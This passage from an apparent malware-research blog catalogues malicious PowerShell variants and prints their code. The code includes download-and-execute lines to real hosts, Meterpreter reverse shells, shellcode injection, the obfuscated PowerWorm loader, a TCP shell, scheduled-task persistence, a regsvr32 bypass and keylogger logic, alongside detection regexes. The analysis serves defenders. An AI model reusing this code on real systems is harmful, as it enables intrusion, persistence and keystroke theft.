command. Of note\r\nfor this one is the passing of the username as a value to the “u” parameter in the web request. This is a common “check-in”\r\nactivity so the attacker knows whom they have infected; it can be used to further handle how subsequent interactions take\r\nplace (e.g. block further connections if known sandbox username).\r\n$x=$Env:username;$u=\"http://54.213.195[.]138/s2.txt?u=\" + $x;$p =\r\n[System.Net.WebRequest]::GetSystemWebProxy();$p.Credentials=\r\n[System.Net.CredentialCache]::DefaultCredentials;$w=New-Object\r\nnet.webclient;$w.proxy=$p;$w.UseDefaultCredentials=$true;$s=$w.DownloadString($u);Invoke-Expression -Command $s;\r\nMeterpreter RHTTP (6 Samples – 0.15% Coverage)\r\nThis next technique simply pulls down the Invoke-Shellcode script used in tools such as PowerShell Empire and\r\nPowerSploit, and then calls the function to generate a reverse HTTPS Meterpreter shell.\r\nAll but one of the samples pulled code from GitHub, either directly through the official repository or through a forked\r\nversion.\r\nGitHub –\r\niex (New-Object\r\nNet.WebClient).DownloadString(\"https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1\"); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 88.160.254[.]183 -Lport 8080 -Force\r\nNon-GitHub –\r\nIEX (New-Object Net.WebClient).DownloadString('http://el8[.]pw/ps/CodeExecution/Invoke-Shellcode.ps1');\r\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 65.112.221[.]34 -Lport 443 -Force\r\nDownloader Kraken (5 Samples – 0.12% Coverage)\r\nI called this one “Kraken” simply because of the filename of the executable it downloads, (“Kraken.jpg”), but it uses a\r\nsimilar download technique as seen in Downloader DFSP. 
One difference is that instead of using the “$env” variable\r\ndirectly, it uses System.IO.Path to retrieve the path for the $TEMP directory.\r\n$TempDir = [System.IO.Path]::GetTempPath(); (New-Object\r\nSystem.Net.WebClient).DownloadFile(\"http://kulup.isikun.edu.tr/Kraken.jpg\",\"  $TempDir\\syshost.exe\"); start\r\n$TempDir\\syshost.exe;\r\nAppLocker Bypass (4 Samples – 0.12% Coverage)\r\nThis next technique uses PowerShell to run the regsvr32 tool to bypass Microsoft Windows AppLocker. This technique was\r\nfound by Casey Smith (@subTee) and abuses the fact that scripts are executed when unregistering a COM object via\r\nregsvr32.\r\nregsvr32 /u /s /i:http://<IP_REDACTED>/test.jpg scrobj.dll\r\nEmbedded Payloads\r\nPowerShell code identified with the primary intention of launching embedded payloads, such as shellcode.\r\nShellcode Inject (1,147 Samples – 27.98% Coverage),\r\nUnicorn (611 Samples – 14.90% Coverage),\r\nSET (199 Samples – 4.85% Coverage),\r\nUnicorn Modified (14 Samples – 0.34% Coverage)\r\nAs I already showed examples of SET and Magic Unicorn’s implementation of the Shellcode Injection technique, I’ve\r\ndecided to just lump all of the variants together using this shellcode injection template. 
Below is a sample from the\r\n“Shellcode Inject” variant, which is a copy of Matt Graeber’s original post, and you’ll immediately see the similarities with\r\nthe SET and Magic Unicorn code.\r\n$c = '[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint\r\nflAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z =\r\n0xbf,<SHELLCODE>,0x19;$g = 0x1000;if ($z.Length -gt 0x1000){$g =\r\n$z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]\r\n($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};\r\nWhile the Cerber downloader accounted for a large share of the EncodedCommand usage found in Microsoft Word documents,\r\nthese four variants, which all use the same technique, account for almost all of the samples launched from EXE files.\r\nThe gist of the code is that they import functions from DLLs in the following order:\r\n“kernel32.dll” VirtualAlloc\r\n“kernel32.dll” CreateThread\r\n“msvcrt.dll” memset\r\nThen they load their shellcode into an array of bytes using the “0x” hex representation. 
Next, they call VirtualAlloc to\r\nallocate, at minimum, a 4,096 byte page of RWX memory, copy the byte-array to memory with memset, and finally transfer\r\nexecution to the shellcode with CreateThread.\r\nOut of the 1,971 samples, there were 1,211 unique shellcode payloads, indicating that over 50% of them were re-used in\r\nother attacks. Most of these tools utilize Metasploit to generate the shellcode, and those that don’t accept a user-specified payload\r\ngenerally opt for reverse Meterpreter shells. For example, the below line is from Magic Unicorn’s code showing how\r\nto specify the MSF payload.\r\nprint(\"PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443\")\r\nThe underlying code for the generation of the payload, including platform, architecture, and encoding:\r\n\"msfvenom -p %s %s %s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform\r\nwindows --smallest -f c\" % (\r\n            payload, ipaddr, port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\nAnother interesting observation is that if you look at the shellcode length, the top 2 lengths were 294 and 312 bytes long,\r\nwith 846 and 544 samples respectively; afterwards the sample counts fall off sharply.\r\nShellcode Length (Bytes) Count\r\n294 846\r\n312 544\r\n337 145\r\n303 131\r\n285 46\r\nWhat makes this interesting is that the sheer volume of identical lengths signals to me that they are likely generating the same\r\npayload with the same tools and using something without much possible variation in length, such as a 4-byte IP compared to\r\na variable length URL as the C2.\r\nAs this blog serves to catalog the differences between these variants, below are regex queries to identify the specific variant.\r\nShellcode Inject\r\n\"^(\\$c = |\\$1 = [\\\"\\']\\$c = )\"\r\n\"\\$g = 0x1000\"\r\n\"\\$z\\.Length \\-gt 
0x1000\"\r\n\"\\$z\\[\\$i\\]\"\r\nUnicorn\r\n\"\\$w \\= Add\\-Type \\-memberDefinition \\$[a-zA-Z0-9]{3,4} \\-Name\"\r\nSET\r\n\"\\$code \\= [\\']{1,2}\\[DllImport\"\r\n\"\\$sc\\.Length -gt 0x1000\\)\"\r\n\"\\$winFunc::memset\"\r\nUnicorn Modified\r\n\"^\\$[a-zA-Z0-9]{5,7} \\= \\'\\[DllImport.+Start\\-sleep 60\\}\\;\"\r\nPowerfun Reverse (100 Samples – 2.44% Coverage),\r\nPowerfun Bind (2 Samples – 0.05% Coverage)\r\nAnother variation on code execution was found inside Powerfun; more specifically, it uses Metasploit’s\r\n“windows/powershell_reverse_tcp” and “powershell_bind_tcp” payloads to create interactive shells with the target system.\r\nThe reverse payload is encoded with base64 and launched via a background process using System.Diagnostics.Process.\r\nReverse payload –\r\nif([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object\r\nSystem.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,\r\n[Convert]::FromBase64String(''H4sIAFHL6FcCA71W6nlhxGUKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipS\r\n[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle\r\n[System.Diagnostics.Process]::Start($s);\r\nThe bind payload sets up a TCP listener by listening with System.Net.Sockets.TCPClient and passing received PowerShell\r\nscript to Invoke-Expression.\r\nBind payload –\r\n$client = New-Object System.Net.Sockets.TCPClient(\"192.168.56.144\",4444);$stream = $client.GetStream();[byte[]]$bytes =\r\n0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName\r\nSystem.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | 
Out-String );$sendback2  =\r\n$sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte =\r\n([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\r\nPowerWorm (19 Samples – 0.46% Coverage)\r\nPowerWorm is a malware family that TrendMicro blogged about in 2014 which has the capability of spreading by infecting\r\nother Microsoft Office DOC(X)/XLS(X) files. The PowerShell code is obfuscated with “junk” data placed between the\r\nlegitimate commands.\r\n'xneZtEDC';$ErrorActionPreference = 'SilentlyContinue';'uqaaPxuaCN';'DOBHbJqlkRM';$kn = (get-wmiobject\r\nWin32_ComputerSystemProduct).UUID;'WVy';'gKEZgPRMl';if ((gp\r\nHKCU:\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) -match $kn){;'mUzql';'jsvZDTQITNa';(Get-Process -id\r\n$pid).Kill();'NgpYRhj';'hVXjCtDvBc';};'tUVXQmXbZ';'lkTzhJZHwxU';'McPzodeY';'vNNYv';function e($dkez)\r\n{;'TfPD';'WTw';$jt = (((iex \"nslookup -querytype=txt $dkez 8.8.8.8\") -match '\"') -replace '\"', '')\r\n[0].Trim();'HdCjwAD';'sVSjtZRvr';$ovg.DownloadFile($jt, $tg);'raVw';'OQNdBkS';$ei =\r\n$ke.NameSpace($tg).Items();'OgnucmQlK';'Qfqxov';$ke.NameSpace($sa).CopyHere($ei, 20);'GBMdJNr';'VMWS';rd\r\n$tg;'pnoFau';'SedloE';};'NxPZPIV';'ypi';'AFElBzCp';'bYRWML';'UYANxqtLg';'QBC';$sa = $env:APPDATA + '\\' +\r\n$kn;'Eaxyty';'IwuaOh';if (!(Test-Path $sa)){;'amYmrKg';'vWAgqtEB';$qr = New-Item -ItemType Directory -Force -Path\r\n$sa;'GqNII';'HNPIQutUpGv';$qr.Attributes = \"Hidden\", \"System\",\r\n\"NotContentIndexed\";'MuRuRa';'CmlkCszVCO';};'ZdmIGyj';'nAYhOpvWV';'BIAgIntvoU';'GJTBzyjr';$zul=$sa+\r\n'\\tor.exe';'swInqmX';'LTXwOFNSuL';$axs=$sa+\r\n'\\polipo.exe';'qkI';'WJPoaNnarn';$tg=$sa+'\\'+$kn+'.zip';'Sgw';'fYthyZ';$ovg=New-Object\r\nSystem.Net.WebClient;'Ils';'GRldQfFnfQK';$ke=New-Object -C 
Shell.Application;'vVoutJQ';'gHXAsaxc';'llaetDv';'Zix';if (!\r\n(Test-Path $zul) -or !(Test-Path $axs)){;'QtJINrwhS';'XkAxtKLAJ';e\r\n'i.vankin.de';'QqVujkSIPS';'dZdn';};'GoemQSlIB';'IOcJU';'FYTMzpCupR';'qEnstu';if (!(Test-Path $zul) -or !(Test-Path $axs))\r\n{;'ZGtSt';'mHkBgIOsU';e\r\n'gg.ibiz.cc';'sDtXmE';'xSBk';};'YaiaAJqKPin';'gFVK';'TumvJVvJKRm';'ULQwp';$pj=$sa+'\\roaminglog';'numdmmhA';'ytEF';saps\r\n$zul -Ar \" --Log `\"notice file $pj`\"\" -wi Hidden;'JCBc';'CjHbOtf';do{sleep 1;$xxl=gc $pj}while(!($xxl -match 'Bootstrapped\r\n100%: Done.'));'wYtpNVJtdz';'XggiQIPFt';saps $axs -a \"socksParentProxy=localhost:9050\" -wi Hidden;'dlV';'zVLSO';sleep\r\n7;'FzlDdEynuUz';'Ci';$zpp=New-Object System.Net.WebProxy(\"localhost:8123\");'MsOkmLs';'zRW';$zpp.useDefaultCredentials\r\n= $true;'PWXVXIMqb';'lAy';$ovg.proxy=$zpp;'gEkdkGPjVp';'xerooSjz';$ca='http://powerwormjqj42hu[.]onion/get.php?\r\ns=setup&mom=14C6EFBB-F19D-DC11-83A7-001B38A0DF85&uid=' + $kn;'SGCFq';'GkVVnp';while(!$qmh)\r\n{$qmh=$ovg.downloadString($ca)};'rHo';'jtshvrR';if ($qmh -ne 'none'){;'Ju';'VuUTlp';iex $qmh;'blhE';'AeIepyNd';};'whSp';\r\nCleaned-up slightly –\r\n$ErrorActionPreference = 'SilentlyContinue';\r\n$kn = (get-wmiobject Win32_ComputerSystemProduct).UUID;\r\nif ((gp HKCU:\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) -match $kn) {;\r\n(Get-Process -id $pid).Kill();\r\n};\r\nfunction e($dkez){;\r\n$jt = (((iex \"nslookup -querytype=txt $dkez 8.8.8.8\") -match '\"') -replace '\"', '')[0].Trim();\r\n$ovg.DownloadFile($jt, $tg);\r\n$ei = $ke.NameSpace($tg).Items();\r\n$ke.NameSpace($sa).CopyHere($ei, 20);\r\nrd $tg;\r\n};\r\n$sa = $env:APPDATA + '\\' + $kn;\r\nif (!(Test-Path $sa)){;\r\n$qr = New-Item -ItemType Directory -Force -Path $sa;\r\n$qr.Attributes = \"Hidden\", \"System\", 
\"NotContentIndexed\";\r\n};\r\n$zul=$sa+ '\\tor.exe';\r\n$axs=$sa+ '\\polipo.exe';\r\n$tg=$sa+'\\'+$kn+'.zip';\r\n$ovg=New-Object System.Net.WebClient;\r\n$ke=New-Object -C Shell.Application;\r\nif (!(Test-Path $zul) -or !(Test-Path $axs)){;\r\ne 'i.vankin.de';\r\n};\r\nif (!(Test-Path $zul) -or !(Test-Path $axs)){;\r\ne 'gg.ibiz.cc';\r\n};\r\n$pj=$sa+'\\roaminglog';\r\nsaps $zul -Ar \" --Log `\"notice file $pj`\"\" -wi Hidden;\r\ndo{\r\nsleep 1;\r\n$xxl=gc $pj\r\n} while(!($xxl -match 'Bootstrapped 100%: Done.'));\r\nsaps $axs -a \"socksParentProxy=localhost:9050\" -wi Hidden;\r\nsleep 7;\r\n$zpp=New-Object System.Net.WebProxy(\"localhost:8123\");\r\n$zpp.useDefaultCredentials = $true;\r\n$ovg.proxy=$zpp;\r\n$ca='http://powerwormjqj42hu[.]onion/get.php?s=setup&mom=&uid=' + $kn;\r\nwhile(!$qmh){\r\n$qmh=$ovg.downloadString($ca)\r\n};\r\nif ($qmh -ne 'none'){;\r\niex $qmh;\r\n};\r\nThe code will download Tor and Polipo by fetching download URLs for the software from DNS TXT records and then\r\neventually use the software to continuously check for new PowerShell commands that get passed to Invoke-Expression.\r\nMatt Graeber has done an excellent job of analyzing the full capabilities of this malware and provides de-obfuscated,\r\ncommented versions of the underlying PowerShell.\r\nVeil Stream (7 Samples – 0.17% Coverage)\r\nThis is a similar technique to the one described in the “Powerfun Reverse” variant. The PowerShell code is injected into memory\r\nfrom a base64 string and executed with Invoke-Expression, which eventually launches the actual shellcode payload. 
The layout\r\nof the code correlates to the Veil Framework implementation.\r\nInvoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object\r\nIO.MemoryStream (,$([Convert]::FromBase64String('rVZtb5tIEP4eKf9+nJvw==')))),\r\n[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\r\nPersistence\r\nPowerShell code identified with the primary intention of establishing persistence on the host.\r\nScheduled Task COM (11 Samples – 0.27% Coverage)\r\nThis variant seeks to create a persistence mechanism by creating a Scheduled Task that runs the malicious binary. The PE\r\nfile this sample comes from drops a “minecraft.exe” and then launches the PowerShell command below, most likely because it’s\r\neasier to pass this type of functionality off to PowerShell instead of trying to write the code into the original dropper.\r\nThe technique was seen primarily in samples associated with the Retefe banking trojan.\r\n$TaskName = \"Microsoft Windows Driver Update\"\r\n$TaskDescr = \"Microsoft Windows Driver Update Services\"\r\n$TaskCommand = \"C:\\ProgramData\\WindowsUpgrade\\minecraft.exe\"\r\n$TaskScript = \"\"\r\n$TaskArg = \"\"\r\n$TaskStartTime = [datetime]::Now.AddMinutes(1)\r\n$service = new-object -ComObject(\"Schedule.Service\")\r\n$service.Connect()\r\n$rootFolder = $service.GetFolder(\"\\\")\r\n$TaskDefinition = $service.NewTask(0)\r\n$TaskDefinition.RegistrationInfo.Description = \"$TaskDescr\"\r\n$TaskDefinition.Settings.Enabled = $true\r\n$TaskDefinition.Settings.Hidden = $true\r\n$TaskDefinition.Settings.RestartCount = \"5\"\r\n$TaskDefinition.Settings.StartWhenAvailable = 
$true\r\n$TaskDefinition.Settings.StopIfGoingOnBatteries = $false\r\n$TaskDefinition.Settings.RestartInterval = \"PT5M\"\r\n$triggers = $TaskDefinition.Triggers\r\n$trigger = $triggers.Create(8)\r\n$trigger.StartBoundary = $TaskStartTime.ToString(\"yyyy-MM-dd'T'HH:mm:ss\")\r\n$trigger.Enabled = $true\r\n$trigger.Repetition.Interval = \"PT5M\"\r\n$TaskDefinition.Settings.DisallowStartIfOnBatteries = $true\r\n$Action = $TaskDefinition.Actions.Create(0)\r\n$action.Path = \"$TaskCommand\"\r\n$action.Arguments = \"$TaskArg\"\r\n$rootFolder.RegisterTaskDefinition(\"$TaskName\",$TaskDefinition,6,\"System\",$null,5)\r\nSCHTASKS /run /TN $TaskName\r\nVB Task (10 Samples – 0.24% Coverage)\r\nThis grouping of PowerShell code originally comes from a PE that executes PowerShell with EncodedCommand, which\r\nthen creates a VBScript that is installed as a Scheduled Task. The VBScript simply launches another PowerShell script once it\r\nruns to achieve this.\r\n$path= \"$env:userprofile\\appdata\\local\\microsoft\\Windows\"\r\nif(-not(Test-Path -Path($path)))\r\n{mkdir $path}\r\n$fileout=\"$path\\L69742.vbs\";\r\n$encstrvbs=\"c2V0IHdzcyA9IENyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpDQpzdHIgPSAicG93ZXIiICYgInNoIiAmICJlbGwiICYgIi5lI\r\n$bytevbs=[System.Convert]::FromBase64String($encstrvbs);\r\n$strvbs=[System.Text.Encoding]::ASCII.GetString($bytevbs);\r\n$strvbs = $strvbs.replace('#dpath#',$path);\r\nset-content $fileout $strvbs;\r\n$tmpfile=\"$env:TEMP\\U1848931.TMP\";\r\n$pscode_b64  =get-content $tmpfile | out-string;\r\n$pscode_b64=$pscode_b64.trim();\r\n$pscode = 
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pscode_b64))\r\n$id = [string](get-random -min 10000 -max 100000)\r\n$pscode = $pscode.replace('#id#',$id);\r\nset-content \"$path\\mc.ps1\" $pscode\r\n$taskstr=\"schtasks /create /F /sc minute /mo 2 /tn \"\"GoogleServiceUpdate\"\" /tr \"\"\\\"\"$fileout\"\"\\\"\"   \";\r\niex 'cmd /c $taskstr';\r\nThe base64 decoded VBScript –\r\nset wss = CreateObject(\"WScript.Shell\")\r\nstr = \"power\" & \"sh\" & \"ell\" & \".e\" & \"xe -NoP -sta -NonI -e\" & \"xe\" & \"c byp\" & \"as\" & \"s -fi\" & \"\r\npath = \"#dpath#\"\r\nstr = str + path + \"\\mc.ps1\"\r\nwss.Run str, 0\r\nDynAmite Launcher (6 Samples – 0.15% Coverage),\r\nDynAmite KL (1 Sample – 0.02% Coverage)\r\nDynAmite is a “Malware Creation Toolkit” which comes with the standard capabilities one comes to expect from such\r\na tool.\r\nIt does give you the ability to mix and match the features you want and generates a PE wrapper that carries out the selected\r\ntasks, usually by simply executing PowerShell commands. 
The majority of code that I saw generated by this kit was taken\r\nfrom public tools, but with the variable names and locations swapped around.\r\nThe “DynAmite Launcher” variant covers the persistence aspect, which is established through creating Scheduled Tasks.\r\nBelow are three different iterations of this, most likely from different versions and configurations.\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\Backdoor\" /XML C:\\Windows\\Temp\\task.xml\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\Keylogger\" /XML C:\\Windows\\Temp\\task2.xml\r\nSCHTASKS /run /TN \"Microsoft\\Windows\\DynAmite\\Backdoor\"\r\nSCHTASKS /run /TN \"Microsoft\\Windows\\DynAmite\\Keylogger\"\r\nRemove-Item \"C:\\Windows\\Temp\\*.xml\"\r\n#create backdoor task\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\DynAmite\" /XML C:\\Windows\\Temp\\dynatask.xml\r\n#create upload task\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\Uploader\" /XML C:\\Windows\\Temp\\upltask.xml\r\n#run backdoor task\r\nSCHTASKS /run /TN \"Microsoft\\Windows\\DynAmite\\DynAmite\"\r\n#create registry entries for keylogger and screenspy\r\nNew-ItemProperty -path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name Keylogger -\r\nPropertyType String -Value \"C:\\Windows\\dynakey.exe\"\r\nNew-ItemProperty -path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name ScreenSpy -\r\nPropertyType String -Value \"C:\\Windows\\dynascr.exe\"\r\n#run keylogger and screenspy\r\nC:\\Windows\\dynakey.exe\r\nC:\\Windows\\dynascr.exe\r\n#cleanup temp folder\r\nRemove-Item \"C:\\Windows\\Temp\\*\"\r\n$loot = ($env:LOCALAPPDATA + \"\\dyna\\\"); md $loot\r\ncertutil -decode res.crt ($loot + \"res\"); certutil -decode kl.crt ($loot + \"kl.exe\"); certutil -decode st.crt ($loot +\r\n\"st.exe\");  certutil -decode cry.crt ($loot 
+ \"cry.exe\"); certutil -decode t1.crt ($env:TEMP + \"\\t1.xml\"); certutil -\r\ndecode t2.crt ($env:TEMP + \"\\t2.xml\"); certutil -decode t3.crt ($env:TEMP + \"\\t3.xml\"); certutil -decode t4.crt\r\n($env:TEMP + \"\\t4.xml\"); certutil -decode t5.crt ($env:TEMP + \"\\t5.xml\"); certutil -decode bd.crt\r\nC:\\ProgramData\\bd.exe\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\1\" /XML ($env:TEMP + \"\\t1.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\2\" /XML ($env:TEMP + \"\\t2.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\3\" /XML ($env:TEMP + \"\\t3.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\4\" /XML ($env:TEMP + \"\\t4.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\5\" /XML ($env:TEMP + \"\\t5.xml\")\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\1\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\2\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\3\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\4\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\5\"\r\nRemove-Item ($env:TEMP + \"\\*.xml\") -Recurse –Force\r\nFor the “DynAmite KL” variant, it’s the keylogger portion of the kit but directly lifts code from an older version of the\r\nPowerSploit function Get-Keystrokes. 
Below is the meat of the script and a comparison of the two pieces, showing how\r\nDynAmite changes the location of the variables and types.\r\nGet-Keystrokes –\r\n$LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000\r\n$RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000\r\n$LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000\r\n$RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq\r\n0x8000\r\n$LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000\r\n$RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000\r\n$TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000\r\n$SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000\r\n$DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000\r\n$EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000\r\n$BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000\r\n$LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000\r\n$RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000\r\n$UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000\r\n$DownArrow    = 
($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000\r\n$LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000\r\n$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000\r\nif ($LeftShift -or $RightShift) {$LogOutput += '[Shift]'}\r\nif ($LeftCtrl  -or $RightCtrl)  {$LogOutput += '[Ctrl]'}\r\nif ($LeftAlt   -or $RightAlt)   {$LogOutput += '[Alt]'}\r\nif ($TabKey)       {$LogOutput += '[Tab]'}\r\nif ($SpaceBar)     {$LogOutput += '[SpaceBar]'}\r\nif ($DeleteKey)    {$LogOutput += '[Delete]'}\r\nif ($EnterKey)     {$LogOutput += '[Enter]'}\r\nif ($BackSpaceKey) {$LogOutput += '[Backspace]'}\r\nif ($LeftArrow)    {$LogOutput += '[Left Arrow]'}\r\nif ($RightArrow)   {$LogOutput += '[Right Arrow]'}\r\nif ($UpArrow)      {$LogOutput += '[Up Arrow]'}\r\nif ($DownArrow)    {$LogOutput += '[Down Arrow]'}\r\nif ($LeftMouse)    {$LogOutput += '[Left Mouse]'}\r\nif ($RightMouse)   {$LogOutput += '[Right Mouse]'}\r\nFunction DynAKey –\r\n$LeftShift = $ImportDll::GetAsyncKeyState(160)\r\n$RightShift = $ImportDll::GetAsyncKeyState(161)\r\n$LeftCtrl = $ImportDll::GetAsyncKeyState(162)\r\n$RightCtrl = $ImportDll::GetAsyncKeyState(163)\r\n$LeftAlt = $ImportDll::GetAsyncKeyState(164)\r\n$RightAlt = $ImportDll::GetAsyncKeyState(165)\r\n$TabKey = $ImportDll::GetAsyncKeyState(9)\r\n$SpaceBar = $ImportDll::GetAsyncKeyState(32)\r\n$DeleteKey = $ImportDll::GetAsyncKeyState(127)\r\n$EnterKey = $ImportDll::GetAsyncKeyState(13)\r\n$BackSpaceKey = $ImportDll::GetAsyncKeyState(8)\r\n$LeftArrow = $ImportDll::GetAsyncKeyState(37)\r\n$RightArrow = $ImportDll::GetAsyncKeyState(39)\r\n$UpArrow = $ImportDll::GetAsyncKeyState(38)\r\n$DownArrow = $ImportDll::GetAsyncKeyState(34)\r\n$LeftMouse = $ImportDll::GetAsyncKeyState(1)\r\n$RightMouse = 
$ImportDll::GetAsyncKeyState(2)\r\nif ((($LeftShift -eq -32767) -or ($RightShift -eq -32767)) -or (($LeftShift -eq -32768) -or ($RightShfit -eq\r\n-32768))) {$LogOutput += '[Shift] '}\r\nif ((($LeftCtrl -eq -32767) -or ($LeftCtrl -eq -32767)) -or (($RightCtrl -eq -32768) -or ($RightCtrl -eq -32768)))\r\n{$LogOutput += '[Ctrl] '}\r\nif ((($LeftAlt -eq -32767) -or ($LeftAlt -eq -32767)) -or (($RightAlt -eq -32767) -or ($RightAlt -eq -32767)))\r\n{$LogOutput += '[Alt] '}\r\nif (($TabKey -eq -32767) -or ($TabKey -eq -32768)) {$LogOutput += '[Tab] '}\r\nif (($SpaceBar -eq -32767) -or ($SpaceBar -eq -32768)) {$LogOutput += '[SpaceBar] '}\r\nif (($DeleteKey -eq -32767) -or ($DeleteKey -eq -32768)) {$LogOutput += '[Delete] '}\r\nif (($EnterKey -eq -32767) -or ($EnterKey -eq -32768)) {$LogOutput += '[Enter] '}\r\nif (($BackSpaceKey -eq -32767) -or ($BackSpaceKey -eq -32768)) {$LogOutput += '[Backspace] '}\r\nif (($LeftArrow -eq -32767) -or ($LeftArrow -eq -32768)) {$LogOutput += '[Left Arrow] '}\r\nif (($RightArrow -eq -32767) -or ($RightArrow -eq -32768)) {$LogOutput += '[Right Arrow] '}\r\nif (($UpArrow -eq -32767) -or ($UpArrow -eq -32768)) {$LogOutput += '[Up Arrow] '}\r\nif (($DownArrow -eq -32767) -or ($DownArrow -eq -32768)) {$LogOutput += '[Down Arrow] '}\r\nif (($LeftMouse -eq -32767) -or ($LeftMouse -eq -32768)) {$LogOutput += '[Left Mouse] '}\r\nif (($RightMouse -eq -32767) -or ($RightMouse -eq -32768)) {$LogOutput += '[Right Mouse] '}\r\nOther Techniques\r\nAMSI Bypass (8 Samples – 0.20% Coverage)\r\nAntimalware Scan Interface (AMSI) is a new feature Microsoft released in Windows 10 and is designed to facilitate\r\ncommunication between applications and AV products. 
